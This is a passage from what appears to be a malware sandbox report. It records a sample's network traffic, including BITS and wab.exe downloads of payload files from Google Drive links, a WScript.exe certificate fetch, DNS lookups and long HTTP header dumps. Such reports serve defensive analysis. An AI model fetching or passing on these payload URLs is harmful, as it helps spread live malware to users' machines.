X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
    Accept-Ranges: bytes
    Content-Length: 511832
    Last-Modified: Mon, 04 Mar 2024 22:35:23 GMT
    Date: Tue, 05 Mar 2024 09:16:33 GMT
    Expires: Tue, 05 Mar 2024 09:16:33 GMT
    Cache-Control: private, max-age=0
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-gb
    GET
    https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download
    Remote address:
    142.250.179.225:443
    Request
    GET /download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Encoding: identity
    If-Unmodified-Since: Mon, 04 Mar 2024 22:35:23 GMT
    User-Agent: Microsoft BITS/7.5
    Host: drive.usercontent.google.com
    Response
    HTTP/1.1 200 OK
    X-GUploader-UploadID: ABPtcPqgLriILyrMIbrmn5mVobBLFDvo1tSDn03HERAmVIpuJHIIUmCf9boogIHDjWFGbh757EU
    Content-Type: application/octet-stream
    Content-Security-Policy: sandbox
    Content-Security-Policy: default-src 'none'
    Content-Security-Policy: frame-ancestors 'none'
    X-Content-Security-Policy: sandbox
    Cross-Origin-Opener-Policy: same-origin
    Cross-Origin-Embedder-Policy: require-corp
    Cross-Origin-Resource-Policy: same-site
    X-Content-Type-Options: nosniff
    Content-Disposition: attachment; filename="Manegeklovners.u32"
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Credentials: false
    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
    Accept-Ranges: bytes
    Content-Length: 511832
    Last-Modified: Mon, 04 Mar 2024 22:35:23 GMT
    Date: Tue, 05 Mar 2024 09:16:34 GMT
    Expires: Tue, 05 Mar 2024 09:16:34 GMT
    Cache-Control: private, max-age=0
    X-Goog-Hash: crc32c=7+PVzg==
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-gb
    HEAD
    https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download
    Remote address:
    142.250.179.225:443
    Request
    HEAD /download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Encoding: identity
    User-Agent: Microsoft BITS/7.5
    Host: drive.usercontent.google.com
    Response
    HTTP/1.1 200 OK
    X-GUploader-UploadID: ABPtcPrbid5OE1-Knqn3nqmnGiJX-VCkxuKwkSj3l2UBzfKasDWPaAg4m_Jv8hiZu8cqVkoggW8
    Content-Type: application/octet-stream
    Content-Security-Policy: sandbox
    Content-Security-Policy: default-src 'none'
    Content-Security-Policy: frame-ancestors 'none'
    X-Content-Security-Policy: sandbox
    Cross-Origin-Opener-Policy: same-origin
    Cross-Origin-Embedder-Policy: require-corp
    Cross-Origin-Resource-Policy: same-site
    X-Content-Type-Options: nosniff
    Content-Disposition: attachment; filename="Manegeklovners.u32"
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Credentials: false
    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
    Accept-Ranges: bytes
    Content-Length: 511832
    Last-Modified: Mon, 04 Mar 2024 22:35:23 GMT
    Date: Tue, 05 Mar 2024 09:16:42 GMT
    Expires: Tue, 05 Mar 2024 09:16:42 GMT
    Cache-Control: private, max-age=0
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-gb
    GET
    https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download
    Remote address:
    142.250.179.225:443
    Request
    GET /download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Encoding: identity
    If-Unmodified-Since: Mon, 04 Mar 2024 22:35:23 GMT
    User-Agent: Microsoft BITS/7.5
    Host: drive.usercontent.google.com
    Response
    HTTP/1.1 200 OK
    X-GUploader-UploadID: ABPtcPqEPvUt-TjpfGQfi95zYrSLFilnj5im5_uBhWB-FBNVM9AcsLBw9NfOBGVssO1abq9lHEc
    Content-Type: application/octet-stream
    Content-Security-Policy: sandbox
    Content-Security-Policy: default-src 'none'
    Content-Security-Policy: frame-ancestors 'none'
    X-Content-Security-Policy: sandbox
    Cross-Origin-Opener-Policy: same-origin
    Cross-Origin-Embedder-Policy: require-corp
    Cross-Origin-Resource-Policy: same-site
    X-Content-Type-Options: nosniff
    Content-Disposition: attachment; filename="Manegeklovners.u32"
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Credentials: false
    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
    Accept-Ranges: bytes
    Content-Length: 511832
    Last-Modified: Mon, 04 Mar 2024 22:35:23 GMT
    Date: Tue, 05 Mar 2024 09:16:42 GMT
    Expires: Tue, 05 Mar 2024 09:16:42 GMT
    Cache-Control: private, max-age=0
    X-Goog-Hash: crc32c=7+PVzg==
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-gb
    GET
    https://drive.google.com/uc?export=download&id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi
    wab.exe
    Remote address:
    172.217.169.78:443
    Request
    GET /uc?export=download&id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: drive.google.com
    Cache-Control: no-cache
    Response
    HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Tue, 05 Mar 2024 09:17:18 GMT
    Location: https://drive.usercontent.google.com/download?id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'nonce-vELJgGEgfIkajmUD7ZJwEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-gb
    GET
    https://drive.usercontent.google.com/download?id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi&export=download
    wab.exe
    Remote address:
    142.250.179.225:443
    Request
    GET /download?id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Connection: Keep-Alive
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Response
    HTTP/1.1 200 OK
    X-GUploader-UploadID: ABPtcPqt8erdZwaDeNcVfwRxmCFvpaCcmp9qtSb3hu0BnbRxjtii-lU5KbGsvrbI2ra9mGaqOTo
    Content-Type: application/octet-stream
    Content-Security-Policy: sandbox
    Content-Security-Policy: default-src 'none'
    Content-Security-Policy: frame-ancestors 'none'
    X-Content-Security-Policy: sandbox
    Cross-Origin-Opener-Policy: same-origin
    Cross-Origin-Embedder-Policy: require-corp
    Cross-Origin-Resource-Policy: same-site
    X-Content-Type-Options: nosniff
    Content-Disposition: attachment; filename="LRKVASBQNAJnYAeoGMaND130.bin"
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Credentials: false
    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
    Accept-Ranges: bytes
    Content-Length: 241728
    Last-Modified: Mon, 04 Mar 2024 22:32:42 GMT
    Date: Tue, 05 Mar 2024 09:17:20 GMT
    Expires: Tue, 05 Mar 2024 09:17:20 GMT
    Cache-Control: private, max-age=0
    X-Goog-Hash: crc32c=KuIstA==
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • 23.48.165.139:80
    http://repository.certum.pl/ctnca.cer
    http
    WScript.exe
    411 B
    2.7kB
    6
    4

    HTTP Request

    GET http://repository.certum.pl/ctnca.cer

    HTTP Response

    200
  • 172.217.169.78:443
    https://drive.google.com/uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs
    tls, http
    2.2kB
    12.8kB
    16
    15

    HTTP Request

    HEAD https://drive.google.com/uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs

    HTTP Response

    303

    HTTP Request

    GET https://drive.google.com/uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs

    HTTP Response

    303

    HTTP Request

    HEAD https://drive.google.com/uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs

    HTTP Response

    303

    HTTP Request

    GET https://drive.google.com/uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs

    HTTP Response

    303
  • 142.250.179.225:443
    https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download
    tls, http
    21.0kB
    1.1MB
    428
    817

    HTTP Request

    HEAD https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download

    HTTP Response

    200

    HTTP Request

    GET https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download

    HTTP Response

    200

    HTTP Request

    HEAD https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download

    HTTP Response

    200

    HTTP Request

    GET https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download

    HTTP Response

    200
  • 172.217.169.78:443
    https://drive.google.com/uc?export=download&id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi
    tls, http
    wab.exe
    946 B
    9.0kB
    9
    12

    HTTP Request

    GET https://drive.google.com/uc?export=download&id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi

    HTTP Response

    303
  • 142.250.179.225:443
    https://drive.usercontent.google.com/download?id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi&export=download
    tls, http
    wab.exe
    6.4kB
    264.2kB
    118
    197

    HTTP Request

    GET https://drive.usercontent.google.com/download?id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi&export=download

    HTTP Response

    200
  • 8.8.8.8:53
    repository.certum.pl
    dns
    WScript.exe
    132 B
    213 B
    2
    1

    DNS Request

    repository.certum.pl

    DNS Request

    repository.certum.pl

    DNS Response

    23.48.165.139
    23.48.165.155

  • 8.8.8.8:53
    drive.google.com
    dns
    wab.exe
    62 B
    78 B
    1
    1

    DNS Request

    drive.google.com

    DNS Response

    172.217.169.78

  • 8.8.8.8:53
    drive.usercontent.google.com
    dns
    wab.exe
    148 B
    90 B
    2
    1

    DNS Request

    drive.usercontent.google.com

    DNS Request

    drive.usercontent.google.com

    DNS Response

    142.250.179.225

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

    Filesize

    67KB

